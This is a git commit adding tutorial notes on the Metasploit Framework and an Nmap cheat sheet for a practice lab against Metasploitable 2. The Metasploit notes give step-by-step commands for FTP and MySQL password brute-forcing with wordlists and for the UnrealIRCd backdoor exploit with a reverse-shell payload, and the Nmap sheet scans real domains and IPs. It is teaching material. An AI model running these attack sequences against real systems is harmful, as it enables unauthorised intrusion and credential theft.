Added more source code files.

Author: buckyroberts

.gitignore

@@ -1,6 +1,3 @@
-.idea/.name
-.idea/compiler.xml
-.idea/dictionaries/Bucky.xml
+.idea/
 *.iml
-.idea/misc.xml
 *.xml

Flask

@@ -0,0 +1 @@
+Subproject commit a63fd53cd7cadc815a14169bd70b62352ab41c14

Metasploit/metasploit_notes.txt

@@ -0,0 +1,189 @@
+Metasploit Framework - program with a bunch of built in tools you use (comes with Kali)
+- gather information about target
+- scan for vulnerabilities
+- perform exploits / write your own too
+- This is a command line tool
+
+Metasploit.com
+http://www.rapid7.com/products/metasploit/
+http://www.rapid7.com/products/metasploit/editions.jsp
+- This is the company that maintains the core framework/all the exploits & tools
+- Paid versions include GUI versions of the tools/reporting features/group collab/etc...
+- Free and paid versions both use same core framework & tools (many people prefer CLI)
+
+This is for people who want to check the security of their network or for penetration testers
+You can not run exploits on a target/company without permission (you will go to jail)
+
+-------------------- 
+
+Metasploitable 2 - vulnerable test server we can use to practice on (you can run in VM)
+http://sourceforge.net/projects/metasploitable/files/Metasploitable2/
+
+Note: if database is not connected, before running msfconsole:
+service postgresql start
+service metasploit start
+msfconsole
+
+Metasploitable
+msfadmin
+msfadmin
+
+--------------------
+
+Applications > Exploitation Tools > Metasploit Framework
+
+Note: if database is not connected, before running msfconsole:
+service postgresql start
+service metasploit start
+msfconsole
+
+- Overview -
+Choose an exploit (tool/something you can do)
+Set options
+Run attack
+
+We usually want to get shell
+
+--------------------
+
+Basic Usage
+
+# help (available commands and description of what they are used for)
+?
+
+# show exploits
+show exploits
+
+# search for something
+search mysql
+
+# more info about exploit (gives quick overview/description)
+info auxiliary/scanner/mysql/mysql_login
+
+# when you are ready to use an exploit
+use auxiliary/scanner/mysql/mysql_login
+
+# we arent there yet so lets go back (exit this tool)
+back
+
+--------------------
+
+Intelligence Gathering
+
+# run a simple whois (btw always get whois domain privacy)
+whois thenewboston.com
+
+# get IP address
+host thenewboston.com
+
+# Scan ports (see whats running on the server)
+nmap -F 54.186.250.79
+
+--------------------
+
+Find SSH Version
+
+search ssh_verison
+info auxiliary/scanner/ssh/ssh_version
+use auxiliary/scanner/ssh/ssh_version
+
+show options
+set RHOSTS 54.186.250.79
+show options
+run
+
+--------------------
+
+Crack FTP Password
+
+search ftp_login
+info auxiliary/scanner/ftp/ftp_login
+use auxiliary/scanner/ftp/ftp_login
+
+# Set password list
+set RHOSTS 192.168.80.135
+set THREADS 30
+set USERNAME msfadmin
+set PASS_FILE /usr/share/wordlists/rockyou.txt
+set PASS_FILE Desktop/passwords.txt
+exploit
+
+Ctrl + C (to stop early)
+
+Desktop/passwords.txt
+12345
+123456
+1234567
+12345678
+abc123
+iloveyou
+letmein
+monkey
+msfadmin
+password
+qwerty
+test
+
+--------------------
+
+MySQL Login
+
+use auxiliary/scanner/mysql/mysql_login
+
+set RHOSTS 192.168.80.135
+set BLANK_PASSWORDS true
+set STOP_ON_SUCCESS true
+
+# Set files
+set PASS_FILE Desktop/passwords.txt
+set USER_FILE Desktop/users.txt
+
+exploit
+
+--------------------
+
+Get Backdoor
+
+# Search for an exploit
+search Unreal 3.2.1.8
+
+# Get more information about an exploit
+info exploit/unix/irc/unreal_ircd_3281_backdoor
+use exploit/unix/irc/unreal_ircd_3281_backdoor
+
+# set RHOST to Metasploitable IP
+show options
+set RHOST 198.222.222.2
+show options
+
+# set LHOST to Kali IP
+show payloads
+set payload cmd/unix/reverse
+show options
+set LHOST 198.115.120.2
+
+# Make sure everything is setup and run exploit
+show options
+exploit
+
+Notice it says that a session is opened, but then it just gives you a blinking cursor. You are actually sitting in a terminal shell with the target machine!
+
+whoami
+
+--------------------
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+

Nmap/cheatSheet.sh

@@ -0,0 +1,99 @@
+Tool used to scan a network to discover devices, ports, and services that are running.
+Awesome network security tool
+
+----------
+
+# Scan a single target (sends packets and analyzes servers response)
+nmap thenewboston.com
+
+# Also by IP
+nmap 54.186.250.79
+
+This displays ports detected, states, and services associated with that port
+
+----------
+
+States
+
+open - active and open to connections
+closed - responds to probes but most likely no services running
+filtered - usually means protected by firewall
+unfiltered - Nmap cant determine whether its open or closed
+
+----------
+
+# Scan multiple targets by seperating with space
+nmap 192.168.0.9 192.168.0.17 192.168.0.23
+
+# Scan a range of IP addresses
+nmap 192.168.0.1-30
+
+# You can also scan an entire subnet (0-255)
+nmap 192.168.0.*
+
+----------
+
+# Make a targets.txt file
+cat targets.txt
+- 54.186.250.79
+- 192.168.0.3
+
+# Scan a list of targets (iL means input or import from list)
+nmap -iL targets.txt
+
+----------
+
+# Perform an aggressive scan (tries to detect OS, versions, traceroute, etc...) basically more info
+nmap -A 54.186.250.79
+
+----------
+
+# Trace path to host (all the routers you pass through)
+nmap --traceroute thenewboston.com
+
+This is useful when you have a slow connection and you want to figure out where the bottle neck is.
+
+----------
+
+OS and service detection
+
+# -O to try to detect operating system (usually able to determine the OS from the response)
+nmap -O thenewboston.com
+
+# Determine service versions
+nmap -sV thenewboston.com
+
+----------
+
+Port scanning options
+
+There are 65,535 ports available and by default Nmap only scans the 1,000 most popular ones
+
+# -F to only scan the 100 most popular ones (DNS, http, ssh, ftp, etc...)
+nmap -F thenewboston.com
+
+# -p to only scan specific port(s)
+nmap -p 20-25,80,443 thenewboston.com
+
+# You can also scan ports by name
+nmap -p http,mysql thenewboston.com
+
+# Scan all ports (takes a long time)
+nmap -p- 192.068.0.1
+
+# Only display open ports (I use almost always)
+nmap --open thenewboston.com
+
+----------
+
+# Save scan results to a text file (-oX for XML)
+nmap -F -oN Desktop/results.txt thenewboston.com
+cat Desktop/results.txt
+
+----------
+
+# Verbose updates you more in real time
+nmap -v thenewboston.com
+
+# Display NICs and routes for your system
+nmap --iflist

PythonGTK

@@ -0,0 +1 @@
+Subproject commit 4e8ae3b85b2157b280dec0127129937a2ced21d4